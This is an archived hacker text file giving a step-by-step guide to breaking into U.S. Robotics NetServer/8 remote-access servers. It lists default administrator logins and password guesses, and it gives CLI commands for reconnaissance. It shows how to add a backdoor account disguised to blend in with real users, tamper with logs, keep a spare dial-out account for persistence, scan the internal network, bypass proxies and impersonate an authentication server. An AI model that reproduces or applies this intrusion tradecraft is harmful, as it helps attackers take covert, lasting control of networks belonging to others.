TUCoPS :: General Information :: netserve.txt

US Robotics NetServer/8 Hacking

U.S. Robotics NetServer/8
by hybrid (hybrid@dtmf.org)

Welcome to my brief article explaining different commands etc on the U.S
Robotics NetServers which are becomming incresingly popular. These servers
are an extream sercutity risk to any network that uses them for network
managment, they essentialy give whoever has administrator access _total_
control over its surrounding network, after all, the NetServer is designed
for network managment, I'll go into this in detail in a while. So why am I
writting this article? -- Well I stumbled accross a website one night which
featured information on the U.S. Robotics NetServer, the site's content was
basically braging about the "tough security" of the NetServer, after seeing
this, and I manageed to stop laughing, I decided to write this file, for
your enjoyment :)

So lets take a look at the NetServer. You are likely to stumble accross this
type of system either by the means of dialup modem, or by ip, telnet etc.
The NetServer will identify itself like this:

Welcome to USRobotics
 The Intelligent Choice in Information Access

Note: in most cases admins have made an 'intelligent' choice in choosing this
server for thier networks, but when it comes to system security, I would
avoid the phrase 'intelligent' by a mile. The NetServer, like most OSs/
net amnagment systems, comes with a nice set of factory default logins, which
in most cases will give whoever has these logins super-user access to the
network. Hmm, ok (thats _real_ security - well done USRobotics) When loging
in, the following default accounts will usually get you in:

----            --------        ------------
admin           admin           god
default         default         enough to get god access
.......         ........        ........................
manager         manager         god                 } I've only ever seen 
guest           guest           not good enough       these a few times.

The access that I am going to focus on with this file is the admin access.
The admin account will nearly all the time exist, so try variations of the
password, you know, the usuall shit:

admin   manager
admin   <no pass>      } on some systems I have noticed that finger port
admin   administrator    (79) is open, and will list a suprising amount of
admin   root             info about the admin, ie: last name, location etc,
admin   manage           this would maybee be you're advantage when guessing.

Okee then, you got in. You'll be confronted with somthing a little like this:

NetServer:             } the command line shell. You have several choices,
                         including <help> or <?>.

Right, here are the choices.

CONNECT                  LOGOUT                   TELNET
EXIT                     MANAGE
HELP                     RLOGIN

Very self explanitory, but there are a few things you need to know. To begin
with, the netserver uses differnt keys to edit.. Command Line Edit:  The
following options are available:
^a  - start of command   ^b    - left 1 char      ^d - delete char
^e  - end of command     ^f    - right 1 char     ^n -  next command
^p  - prev command       ESCb  - left 1 word       ESCf - right 1 word
<-  - left 1 char        ->    - right 1 char
up arrow - prev command  down arrow  -  next command

The main option you are interested in from the above menu is the MANAGE
command. Once you have entered the manage session you will be confronted with
the following command line prompt:

manage: or session: (user definable).. hit <?> you will get the following
ADD                      HANGUP                   RENAME
ARP                      HELP                     RESET
ASSIGN                   HIDE                     RESOLVE
BYE                      HISTORY                  RLOGIN
COPY                     KILL                     SAVE
DELETE                   LEAVE                    SET
DIAL                     LIST                     SHOW
DISABLE                  LOGOUT                   TELNET
DO                       PING                     UNASSIGN
ECHO                     QUIT                     VERIFY
ENABLE                   REBOOT
EXIT                     RECONFIGURE

Nice huh? :) right, now I'm going to go into each command in detail, right
from <add> to <verify> and all the sub-commands.


APPLETALK                IP                       SNMP
DNS                      IPX                      SYSLOG
FILTER                   LOGIN_HOST               TFTP
FRAMED_ROUTE             MODEM_GROUP              USER

The add command is used to upgrade, or add to the current network from which
the netserver is hosted. For example, you can update DNS server
configurations/routes/ip designation etc, aswell as link other networks to
work in synthony with each other. The commands are very self explanitory, and
will offer help as you go along. A note though: on most systems the log file
will begin loging everything if it notices a sudden rises in command line
activity, this is not for security reasons, but more for administration
debug, you can alter this if you like, or wipe the log file all together,
more on that in a bit.

When updating/or adding network configurations, the IP formating for the
netserver is as follows:
This field is a IP Host Name or an IP Network Address
The expected format is Station_Address{/Mask_Specifier}
The expected format for the address is a.b.c.d
Each value must be in the range of 0 to 255 decimal.
The address 127.x.x.x is reserved for Loopback and cannot be specified.
The Mask Specifier can be in ip address format
in which case it must be or greater and contiguous
or 'A', 'B', or 'C'
or a numeric value from 8 to 30
describing the number of one bits in the mask
If this is being used to set a User's IP Address
The Mask Specifier can also be 'H' (for Host)
or a numeric value to 32

But before we go and do anything crazy, take a look at the current system
configuration/setup. Here are the options, turn asci log on for future
reference (don't be dumb, 3DES ;) ..

CLI - Missing Required Argument(s):

This field is a KEYWORD. The possible values are:
AARP                     FILTERS                  PROCESSES
ACTIVE                   INIT_SCRIPTS             SERVICES
APPLETALK                INTERFACES               SNMP
AVAILABLE                IP                       SWITCHED
CONNECTIONS              IPX                      SYSLOGS
CRITICAL                 LAN                      TCP
DIAL_OUT                 LOGIN_HOSTS              TFTP
DNS                      MODEM_GROUPS             UDP
FACILITIES               NETWORKS                 USERS
FILES                    PPP
This field is a KEYWORD. The possible values are:
ACCOUNTING               DNS                      NETWORK
APPLETALK                EVENTS                   PPP
AUTHENTICATION           FILE                     SECURITY_OPTION
CLEARTCP                 FILTER                   SNMP
COMMAND                  ICMP                     SYSTEM
CONFIGURATION            IMODEM                   TCP
CONNECTION               INTERFACE                TELNET
CRITICAL_EVENT           IP                       TIME
DATE                     IPX                      UDP
DDP                      MEMORY                   USER
DIAL_OUT                 MODEM_GROUP

As you can see, there are plenty of commands at your dispossal. First, its
always a good idea to check who else is on the system/server, so we use the
list connections command, it should look a little like this:

session:list connections<enter>

IfName    User Name                       Type         DLL
mod:1     shitface                        DIAL_IN      PPP
mod:3     admin                           DIAL_IN      NONE <-- you

The netserver will also have dialout commands, but, this is only using the
server for somthing lame, its full potential is in the IP routing. To check
to see if dialout is enabled anyway, just use the <list dialout> command,
that will tell you what serial pools the modems are connected to. OK then,
now we are going to focus on configuring an account for ourselves, and
blending into the user list with stealth. Before hand though, you need as
much information on the system as possible. So here we go.

session:list dns servers<enter>

Preference Name                           Address         Status
1                                ACTIVE

To gather IP addressing/routing information we can use the following
session:list ip<enter>
CLI - Missing Required Argument(s):
This field is a KEYWORD. The possible values are:
ARP                      NETWORKS

session:list ip addresses<enter>

                   Bcast Reassembly
Address            Algo  Max Size Interface  1     3468      loopback  1     3468      eth:1
session:list ip arp<enter>

IP Address      Phys Address      Type    IfName 00:87:3i:28:24:40 Dynamic eth:1 00:27:ah:01:4f:60 Dynamic eth:1
session:list ip interface_block<enter>


Address            Neighbor        Status   Interface ENABLED   mod:1 ENABLED   eth:1
session:list ip networks<enter>

Name                            Prot Int      State Type Network Address
ip                              IP   eth:1    ENA   STAT
IP-loopback                     IP   loopback ENA   AUTO
2608159-ip-I3                   IP   mod:1    ENA   DYN
session:list ip routes<enter>

Destination        Prot   NextHop         Metric  Interface  NetMgr 1       eth:1  LOCAL 1       loopback  LOCAL 1       loopback  LOCAL 1       loopback  LOCAL 1       eth:1  LOCAL 1       eth:1  LOCAL 1       mod:1  LOCAL 1       eth:1  LOCAL 1       eth:1
session:list tcp connections<enter>

Local Address     Local Port  Remote Address    Remote Port Status   23   0           Listen   139   0           Listen   5000   0           Listen
session:list tftp clients<enter>

session:list udp listeners<enter>

Local Address     Port   69   161   520   1645   2049   2050   3000

To get a complete system configuration use the <show config> command:

session:show configuration<enter>

System Identification:
     Name: RAS_Sam     Contact: hybrid

Authentication  Remote: ENABLED       Local: ENABLED
    Primary Server:    Secondary Server:

Remote Accounting: ENABLED
    Primary Server:    Secondary Server:

     mod:1                    mod:2                    mod:3
     mod:4                    mod:5                    mod:6
     mod:7                    mod:8

IP  Forwarding: ENABLED       Routing: ENABLED       RIP: ENABLED
    Dynamic Pool Beginning Address:    Size: 8
        ip                              ETHERNET_II  eth:1
        IP-loopback                     LOOPBACK     loopback127.0.0.1/A

IPX  Default Gateway: 00000000            Maximum Hops: 15
    Dynamic Pool Beginning Address: 00000000            Members: 0

Appletalk  ARAP: ON      Maximum ARAP Sessions: 8

PPP  Receive Authentication: PAP

DNS  Domain: uber.coffee.co.uk
session:show dns<enter>

Domain Name:                               uber.coffee.co.uk
Number Retries per Server:                 1
Timeout Period in Seconds:                 5

Now thats enough information you will need about the netserver for the time
being. There are also a wealth of other commands concerning to listing of
IP configurations, but those are the more important ones, the next set of
commands list and show information about the netservers files/architecture

session:list files<enter>
DNS.cfg                  } the DNS configuration
EventHandler.cfg         you can view the contents of a file by 
FilterMgr.cfg            using the <show file [file]> command, 
IPForwarder.cfg          this will only show the contents of a
IpxProcess.cfg           file if it is in raw ascii. 

OK, now I'm sure you are feed up with reading what commands the netserver has
it's time to take a look at what it can do, and _how_ you can do it. To begin
with you need you're own account, not just any account though, you need an
account that will blend in with the others. Now here is the intersting part,
when you configure an account, you can specify a set IP for the user you add,
you can then (using your own box and DNS server) set up your own sub-domains,
but the cool thing is.. you can configure this all on the netserver.

The netserver has some very advanced options when setting up accounts, you
can specify that you're IP statistics/routing etc are cloaked and even
spoofed (internally) If you are configuring an account on a net connected
netserver, you will be online, and not even exist. (you are behind a multi-
layer firewall, and you're IP is non-existant)

First things first, its a good idea to get a listing of the current users on
the network so we can make an account that will blend in with the others, and
not stick out to much. For this, use the <list users> command.
session:list users<enter>
                                Login       Network
User Name                       Service     Service    Status   Type
admin                           TELNET  (D) PPP    (D) ACTIVE   LOGIN
shitface                        TELNET  (D) PPP        INACTIVE NETWORK
default                         TELNET      PPP        INACTIVE NETWORK
1233333                         TELNET      PPP        INACTIVE NETWORK
1207706                         TELNET      PPP        INACTIVE NETWORK
1304708                         TELNET      PPP        INACTIVE NETWORK

As you can see the higher ratio of users have a numerical username, therefore
when it comes to configuring our own account, we will have a numerical user-
name aswell -- common sense really. Did you notice that the user 'shitface'
had a PPP dialin connection before? (show connections).. Well the user
shitface will have the correct IP/network configurations in order to
establish a PPP connection. So we need to get more information on the user
shitface. User the command <show user [username]>

session:show user shitface<enter>

Status:                                    INACTIVE
Type:                                      NETWORK
Expiration:                                00-   -0000
Callback Type:                             NORMAL
Phone Number:                              1-800-SCAN-4IT
Alternate Phone Number:                    1-800-OPERATOR
Input Filter:
Output Filter:
Modem Group:                               all
Session Timeout                            0
Idle Timeout:                              0
Network Service                            PPP
Header Compression:                        TCPIP        (D)
MTU:                                       1500
Send Password:
Appletalk:                                 ENABLED      (D)
Appletalk Address Range:                   0 - 0
Filter Zones                               ENABLED      (D)
IP Usage:                                  ENABLED
Address Selection:                         ASSIGN
Remote IP Address:                   (D)
IP Routing:                                NONE
Default Route Option:                      DISABLED
IP RIP Routing Protocol:                   RIPV1
IP RIP Routing Policies:
IP RIP Authentication Key:
IPX Usage:                                 ENABLED   (D)
IPX Address:                               0
IPX Routing:                               RESPOND   (D)
IPX WAN Usage:                             DISABLED  (D)
Spoofing:                                  ENABLED
Max Channels                               1         (D)
Channel Decrement Percent:                 20        (D)
Channel Expansion Percent:                 60        (D)
Expansion Algorithm:                       LINEAR    (D)
Receive ACC Map:                           0         (D)
Transmit ACC Map:                          0         (D)
Compression Algorithm:                     AUTO      (D)
Compression Reset Mode:                    AUTO      (D)
Min Compression Size:                      256       (D)

Now we are going to configure an account for ourselves -- this is nessasary
so we can establish a good PPP connection and blend in with the other users
on the network, we can then implement the tools on our own box for mapping
the internal network, or the darkcyde of the firewall, we can then find all
the other connected boxes on the network.

So, when we configure our network account we need to consider the following,
IP usuage, routing, DNS servers, cloaking, spoofing, _stealth_. On a net
connected netserver you can often use your own specified dns server, but
the network traffic in the arp tables etc will reveal abnormal network
activity to a nosey administrator. The best thing to do is use the servers
internal DNS server, you can later own the DNS server aswell :> Also, if the
network is firewalled (which will always be the case) Extrenal use of a DNS
server would arouse susspisions of the administrator(s).

The default settings for PPP access on netservers is standard PPP protocol,
sometimes the administrator would have enabled CHAP or PAP for login
authentification, and this will usually be authentificated by another box on
the network, therefore you are pretty screwed unless you a) own the
authentification server or b) setup your account for standard PPP login
authentification. -- the only disadvantage with this would be that the
account you created would stick out from the others a little more.

Right, time to make the account. In this case, because the majourity of
account names in the user list are numerical we will create a numerical
account, yep you guessed it, we will create an account called '31337'...

session:add user.... 
CLI - Missing Required Argument(s):
This field is a User Name
        The expected format is an ASCII string.      } options
        The maximum size is 32 characters
        This name must be unique.
ENABLED                  NETWORK_SERVICE          TYPE

You can specify what kind of service you are going to add for yourself, just
keep it to PPP and telnet for the time being, thats what the other users
have, so thats what we'll have. Differnet options for type of service

        The types CALLBACK and DIAL_OUT are mutually exclusive.

So now we are ready to add our user.. The command line is as follows:
session:add user <31337> login_service telnet password <password>

Now to check to see if the user 31337 was addded ok, check the user list..
with the <list users> command
31337                         TELNET      PPP    (D) INACTIVE NETWORK(D)

Right, we got the username there, now we have to activate our capabilitys on
the network. For this we use the <set> command.

session:set user 31337
CLI - Missing Required Argument(s):

This field is a KEYWORD. The possible values are:
CALLBACK_TYPE            MODEM_GROUP              TYPE
INPUT_FILTER             PHONE_NUMBER             } If you are super el8
                                                    you can add a phone
                                                    number in your userfile.

Now, this is optional, and not advisable, but if you want to set your own
IP address (good for subnetting) you can configure your account as follows,
I think I have also done this so you're IP activitys are not loged in the
arp cache.
session:add framed_route user 31337 ip_route (numerical IP address goes here)

We also need to enable the user, the command should be somthing like this:

session:set user 31337 type network
session:set user 31337 type telnet
session:set user 31337 type ppp
session:set user 31337 type login

Now, we have our user setup it's time to test it out. Log out of the system
<exit> reset modems, then dial back in. this time login as 31337 with your
chossen password, which by the way for some reason has to be the same length
as the user account name. Once loged in you should get an automatic PPP
connection.. enable you're PPP client with the internal specified DNS server
default routes etc, and there you go.

Test the DNS server by pinging/telneting whatever to a few host[names] You
now have a secure PPP connection to your host (the USRobotics NetServer) You
can now begin to take a look at what is on the internal network, It is
preferable to use a port mapper such as nmap or similar, you will be
supprised at the boxes you will find connected to the network, as in most
internal networks you will find SunOS/Solaris boxes, UNIX boxes (the
netserver is based on unix -- but i forgot to mention that) you will also
find cisco routers/switches, jet-directs, printers, everything you would
expect to find on an internal LAN network.

Now we've established out net connection, its time to take a look at the
further things you can do with the netserver system. If the network has a
nice amount of modems in the modem serial pool (you can see this in the
show commands) we can configure our account for dialout aswell. This can be
done by using the <set user> commands. The best thig to do here is set up a
seperate account fro dialout only, therefore if the admin notices that
account you wont loose your access alltogether. Once you have set up your
seperate account with login_user and dial_out settings, you can then telnet
back to the netserver (IP obtained via scan --- or the command show system)
Once telneted back to the netserver you can login with your dialout account
user name, and then attach to the modem pool an control the modems just as
you would in a terminal screen, AT etc. You can then dialout whilst you are
similtaniously online aswell.

As in most OSs, the netserver system operates on a multi-user security access
level basis. There are differnet levels of access for example,

        admin   --- super-user
        manager --- manager
        user123 --- standard user
        guest   --- guest access
        default --- default settings

To look at this in more detail, here are the settings for the admin account
and also the settings for the default accounts:

session:show user admin<enter>

Status:                                    ACTIVE
Type:                                      LOGIN
Expiration:                                00-   -0000
Callback Type:                             NORMAL
Phone Number:
Alternate Phone Number:
Input Filter:
Output Filter:
Modem Group:                               all    (D)
Session Timeout                            0
Idle Timeout:                              0
Login Service:                             TELNET  (D)
TCP Port:                                  23    (D)
Terminal:                                  vt100    (D)
Login Host:                      
Host Type:                                 SELECT
session:show user default<enter>

Status:                                    INACTIVE
Type:                                      NETWORK
Expiration:                                00-   -0000
Callback Type:                             NORMAL
Phone Number:
Alternate Phone Number:
Input Filter:
Output Filter:
Modem Group:                               all
Session Timeout                            0
Idle Timeout:                              0
Network Service                            PPP
Header Compression:                        TCPIP
MTU:                                       1514
Send Password:
Appletalk:                                 ENABLED
Appletalk Address Range:                   0 - 0
Filter Zones                               ENABLED
IP Usage:                                  ENABLED
Address Selection:                         ASSIGN
Remote IP Address:               
IP Routing:                                NONE
Default Route Option:                      DISABLED
IP RIP Routing Protocol:                   RIPV1
IP RIP Routing Policies:
IP RIP Authentication Key:
IPX Usage:                                 ENABLED
IPX Address:                               0
IPX Routing:                               RESPOND
IPX WAN Usage:                             DISABLED
Spoofing:                                  DISABLED
Max Channels                               1
Channel Decrement Percent:                 20
Channel Expansion Percent:                 60
Expansion Algorithm:                       LINEAR
Receive ACC Map:                           0
Transmit ACC Map:                          0
Compression Algorithm:                     AUTO
Compression Reset Mode:                    AUTO
Min Compression Size:                      256

You can also see what is going on on the netserver at the time you are on it
bye issueing the following command:

session:list processes<enter>

Index     Name                     Type           Status
2001      NameManager              System         Inactive
12001     Console                  System         Inactive
22001     FileManager              System         Inactive
32001     Configurator             Application    Inactive
42001     Main                     Application    Active
52001     MIB Registrar            Application    Inactive
62001     Config File Manager      Application    Inactive
72001     IP Forwarder             Forwarder      Inactive
82001     UDP Process              Application    Inactive
92001     TCP Process              Application    Inactive
a2001     Telnet                   Application    Inactive
b2001     SLIP Process             Application    Inactive
c2001     TFTP Process c2001       Application    Inactive
d2001     IP Spoofing              Application    Inactive
e2001     Proxy NetBIOS            Application    Inactive
f2001     RoboExec NetManagement   Application    Active
102001    User Manager             Application    Inactive
112001    SNMP Agent               Application    Inactive
122001    Event Handler            Application    Inactive
132001    Point to Point Protocol  Application    Inactive
142001    Domain Name System       Application    Inactive
152001    Filter Manager Process   Application    Inactive
162001    IPX                      Forwarder      Inactive
172001    IPX RIP                  Application    Inactive
182001    SAP                      Application    Inactive
192001    IPX DIAG                 Application    Inactive
1a2001    IPX NETBIOS              Application    Inactive
1b2001    IPX SPOOF                Application    Inactive
1c2001    IPX WAN                  Application    Inactive
1d2001    AppleTalk Forwarder      Forwarder      Inactive
1e2001    AppleTalk NBP/ZIP        Application    Inactive
1f2001    AppleTalk Spoofer        Application    Inactive
202001    AppleTalk RTMP           Application    Inactive
212001    AppleTalk ARAP Framing   Application    Inactive
222001    IPX/IP Dial-out Process  Application    Inactive
232001    File System Compaction ProcessApplication    Inactive
242001    Console Driver           Driver         Inactive
252001    Loopback Driver          Driver         Inactive
262001    Ethernet Driver          Driver         Inactive
272001    Modem Port Driver        Driver         Inactive
282001    Call Init Process        Application    Inactive
292001    IP Routing Instance      Application    Inactive
2a2001    CLI                      Application    Inactive
2b2004    CLI 2b2004               Application    Inactive

The commands on the shell interface are fairly self explanitory and all
offer a limited amount of info in help topics. It appears that on some
netservers, where server authentification is enabled, if an account is set
up, the username and login details are automaticaly transfered to the
authentification server, so any other box on that network connected to the
authentification server will allow you to login with the username you set
up on the netserver, nice big security hole for the admins to ponder over.

There are a few obsticles that you may have to overcome if you find such a
server, exapmple: most netservers are hidden nicley behind firewalls, aswell
as outgoing packets are sent through proxy servers. Again, you have options
here, you could a) attempt to get admin on the proxy servers and the
routers, or b) -- the more favourable option would be to re-configure your
IP routing in the network setup configuration on the netserver. This means
you would bypass any proxy/security servers that are present on that network.

An idea I had a while back when dealing with authentification servers is to
find the the local authentification server on the network, and mirror the
software/OS etc that the authentification server uses. Lets say the
authentification server was (After you have replicated the
server) -- first temporarily take the server offline in the ip routing
configuration, then configure a user account with the fixed IP of (the authentification server).. login as that user when you are
on the box you set up with the authentification software, the idea is that
all authentification packets will be sent to your box, effectivly making you
(the host) the authentification server. It's just an idea anyhow, I've never
tried it out, but I'm sure somthing like that would work.

Anyhow, thats it for this article, I hope you enjoyed it. Take it easy and
remeber to visit my website :) --- hybrid.

                        --- http://hybrid.dtmf.org ---

shouts fly out to: [ D4RKCYDE ] [ B4B0 ] [ 9X ] [ PHUNC ] [ DTMF ] [ MED ]
                   [ zomba ] [ downtime ] [ jasun ] [ substance ] [ tip ]
                   [ gb ] [ ph1x ] [ jorge ] [ lowtek ] [ wirepair ]
                   [ psyclone ] [ oeb ] [ siezer ] [ infidel ] [ knight ]


Version: PGPfreeware 5.0i for non-commercial use
Comment: I Encrypt, Therefore I Am


                    ___ ___ _____.___.____________________  ____________
hybrid@b4b0.org    /   |   \\__  |   |\______   \______   \/_   \______ \
hybrid@ninex.com  /    ~    \/   |   | |    |  _/|       _/ |   ||    |  \
hybrid.dtmf.org   \    Y    /\____   | |    |   \|    |   \ |   ||    `   \
----------------   \___|_  / / ______| |______  /|____|_  / |___/_______  /
                         \/  \/               \/        \/              \/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH